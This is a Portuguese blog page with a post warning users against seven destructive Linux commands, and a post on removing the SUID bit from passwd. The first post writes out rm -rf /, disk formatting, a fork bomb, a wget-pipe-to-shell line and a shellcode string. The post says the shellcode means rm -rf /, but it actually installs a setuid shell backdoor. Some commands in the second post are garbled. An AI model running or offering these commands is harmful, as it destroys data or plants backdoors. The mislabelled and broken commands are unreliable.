domingo, 16 de setembro de 2012

Os 7 comandos mais perigosos do mundo Linux [CUIDADO]

Os 7 comandos mais perigosos do mundo Linux [CUIDADO]

 
Os 7 comandos mais perigosos do mundo Linux [CUIDADO]
É muito normal lermos diversos tutoriais em busca de uma informação e sair digitando todos os comandos que quem o escreveu mandou. É camarada, muita calma nessa hora.
Infelizmente, existem muitos malintencionados por aí que, dentro de um tutorial sério ou no comentário do mesmo, postam certos comandos para que usuários inexperientes se deem mal. Tome muito cuidado com os sites que você visita em busca de informação.
Esta lista abaixo representa os 7 comandos mais perigosos do mundo Linux. São comandos que você NUNCA DEVE EXECUTAR!
Lembre-se: o terminal é uma ferramenta poderosíssima, porém é preciso muito conhecimento para saber usá-lo.
Primeiro comando:
rm-rf /    (com privilégios de root usando o “sudo” ou logado como root)
Este comando irá apagar todo o seu sistema!

Segundo comando:
É o mesmo do comando acima, porém escrito em código hexadecimal.
  • char esp[] __attribute__ ((section(“.text”))) /* e.s.p
  • release */
  • = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
  • “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
  • “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
  • “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
  • “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
  • “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
  • “\x6e\x2f\x73\x68\x00\x2d\x63\x00″
  • “cp -p /bin/sh /tmp/.beyond; chmod 4755
  • /tmp/.beyond;”;

Terceiro comando:
mkfs.ext3 /dev/sda
Este comando irá formatar o seu dispositivo /dev/sda e, claro, irá apagar todos os arquivos contidos nele.

Quarto comando:
|:(){:|:&};:
Conhecido como “Fork Bomb”, ele irá executar inúmeros processos em seu sistema, fazendo com que o seu computador trave na hora!

Quinto comando:
qualquer_comando > /dev/sda
Ele irá escrever a saída do comando executado (qualquer) em /dev/sda, apagando todo o conteúdo preexistente .

sexto comando::
wget http://uma_url_qualquer -O- | sh
O comando wget realiza downloads. Porém, existe no fim da linha um “|”, que funciona como redirecionador. Ou seja, ao término do download, ele executará o arquivo baixado. Se o arquivo não for um shell script, ok. Porém se for, ele executará automaticamente na sua máquina, o que é um prato cheio pra fazer um usuário desavisado se dar mal.

setimo comando:
mv /home/username/* /dev/null
Irá mover diretório home para um lugar que realmente não existe. Em outras palavras, ele irá apagar seu diretório home.

Os comandos listados acima são prejudiciais se executados da forma que exemplificamos. Um exemplo: o sétimo comando prejudicial começa com o comando “mv”, que é responsável por mover arquivos entre diretórios. Ele sozinho não é prejudicial, pelo contrário, é essencial. O problema é usá-lo para “mover a sua home para /dev/null”, que é conhecido como o “buraco negro do Linux”
fonte Blog seja livre

domingo, 2 de setembro de 2012

Como evitar que os usuários alterem suas senhas no linux


Uma das características de segurança mais importantes usados ​​hoje são senhas. Nesta seção, eu vou compartilhar uma dica simples sobre a forma de impedir que seus usuários alterem suas senhas.

Normalmente / usr / bin / passwd tem a seguinte permissão SUID:

# Ls-l / usr / bin / passwd

-rs-x-x 1 root root 17890 9 de maio de 2012 / usr / bin / passwd


Aqui, o valor numérico da permissão de arquivo será 4411.

Quando um arquivo SUID é executado, o processo que corre é concedido o acesso aos recursos do sistema com base no usuário que é dono do arquivo e não o usuário que criou o processo.

Então, agora temos que remover o SUID para o comando, para que os usuários normais não tenha privilégios de atualizar o arquivo:

# Chmod u-s / usr / bin / passwd

ou

# Chmod 511 / usr / bin / passwd

É isso, agora os usuários não podem alterar suas senhas padrão .

traduzido de linux server world.